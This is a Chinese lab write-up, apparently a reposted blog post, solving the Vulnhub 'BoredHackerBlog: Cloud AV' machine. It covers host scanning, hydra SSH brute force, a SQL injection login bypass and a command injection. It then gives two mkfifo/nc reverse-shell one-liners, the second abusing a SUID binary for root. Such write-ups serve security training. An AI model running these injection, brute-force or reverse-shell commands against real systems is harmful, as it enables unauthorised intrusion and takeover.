Vulnhub 靶场之 BoredHackerBlog

admin 2024年12月9日23:45:24评论8 views字数 1227阅读4分5秒阅读模式

靶场简介

Vulnhub

地址:https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/

描述:

这是一个云端反病毒扫描程序!是一种基于云的防病毒扫描服务。

目前,它处于测试模式。系统要求您测试设置并查找漏洞并升级隐私。

难度:简单

目标:获得 root 权限

涉及的任务:

端口扫描

网页应用攻击

SQL 注入

命令注入

暴力破解

代码分析

系统环境

操作系统:

物理机:Arch linux

虚拟机:kali linux

虚拟机程序:Virtualbox

使用程序:

arp-scan 用于目标发现

ping 用于目标发现

arping 用于目标发现

nmap 用于服务识别

nc 用于 shell 反弹

hydra 用于密码破解

burpsuite 用于 web 测试

测试过程

主机发现

sudo arp-scan -I eth0 -l                                                               #arp发现,确定目标ip地址

nmap -sn 192.168.56.1/24                                                          #ping扫描,禁用端口扫描

for i in $(seq 0 10); do ping -c 1 192.168.56.$i; done                 #shell 批量ping扫描 

for i in $(seq 0 10); do sudo arping -c 1 192.168.56.$i; done     #shell 批量arping扫描

部分列举,方式很多,根据实际场景进行选择测试

Vulnhub 靶场之 BoredHackerBlog

服务识别

nmap -p- 192.168.56.108    #进行全端口扫描

nmap -p22,8080 192.168.56.108    #进行端口服务识别

根据发现的主机目标进行全端口扫描,随后进行端口服务发现

Vulnhub 靶场之 BoredHackerBlog

服务进攻

hydra -l root -P rockyou.txt -t 32 -vV  192.168.56.108 ssh -f     #指定账户,密码字典,对目标进行ssh暴力破解 ,ssh尝试长时间未得到密码

Vulnhub 靶场之 BoredHackerBlog

ssh暴力破解长时间未成功,随后web访问8080端口,出现输入框,需要密码,简单测试后发现sql注入漏洞

注入代码:" or 1=1 --  后面有一个空格

Vulnhub 靶场之 BoredHackerBlog

随后进入一个新的页面,简单测试后发现存在命令行注入漏洞

命令行注入代码:| command

Vulnhub 靶场之 BoredHackerBlog

通过命令行注入,执行nc,反弹shell

rm /tmp/m;mkfifo /tmp/m;cat /tmp/m|/bin/sh -i 2>&1|nc 192.168.56.107 4444 >/tmp/m

Vulnhub 靶场之 BoredHackerBlog

随后在用户主目录发现拥有suid,root权限的可执行程序,通过此程序调用nc反弹shell,获得root权限

./upload_cloudav "rm /tmp/m;mkfifo /tmp/m;cat /tmp/m|/bin/sh -i 2>&1|nc 192.168.56.107 5555 >/tmp/m"

Vulnhub 靶场之 BoredHackerBlog

Vulnhub 靶场之 BoredHackerBlog

完结撒花

积极向上

勇往直前

原文始发于微信公众号(人遁安全):Vulnhub 靶场之 BoredHackerBlog

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月9日23:45:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub 靶场之 BoredHackerBloghttps://cn-sec.com/archives/2025137.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息